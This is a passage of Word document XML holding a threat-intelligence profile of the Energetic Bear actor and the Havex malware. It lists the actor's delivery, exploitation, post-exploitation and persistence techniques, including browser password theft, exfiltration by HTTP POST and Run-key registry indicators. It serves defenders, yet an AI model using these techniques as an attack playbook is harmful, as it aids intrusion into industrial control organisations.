        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP-based C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE259A2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specific activities and capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C955E9C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IOCS FROM THE ACTOR ENERGETIC BEAR AND THE HAVEX MALWARE</w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:anchor="iocs-from-the-actor-energetic-bear-and-the-havex-malware" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="395B80CE" w14:textId="05E8EF97" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718A252F" wp14:editId="2012A24C">
            <wp:extent cx="5715000" cy="2324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715000" cy="2324100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06693BAD" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Actor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E23115A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Associated with the Russian Federation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D5154" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active over multiple years</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01060718" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active primarily during Moscow business hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4AD5B2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeted organizations based in the industry control system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sector</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="54F4ED6C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Goal of gathering intelligence on ICS-based organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534532C8" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use of custom malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA07BD" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Attack and delivery TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7926A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52489B30" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Watering hole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676607F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compromised web servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660BCBB" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Exploitation TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08352E8C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PDF exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4777D0" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java and IE exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC6749" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Word exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA35E1E" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Custom binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E95D1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Post-exploitation TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA64280" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Local system enumeration for OS, username, processes, internet history, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151FE97" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scan for known ICS-related ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0DBBE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DLL injection to migrate into </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="431AEFA6" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect Outlook address book </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B68953C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect passwords from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>browsers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76320825" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Save exfiltrated data to an encrypted file on disk before delivery to the C2 in an HTTP POST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="786F5C43" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Persistence TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63337B09" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Run key registry modifications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903FC7C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"TmProvider"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"TmProvider"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
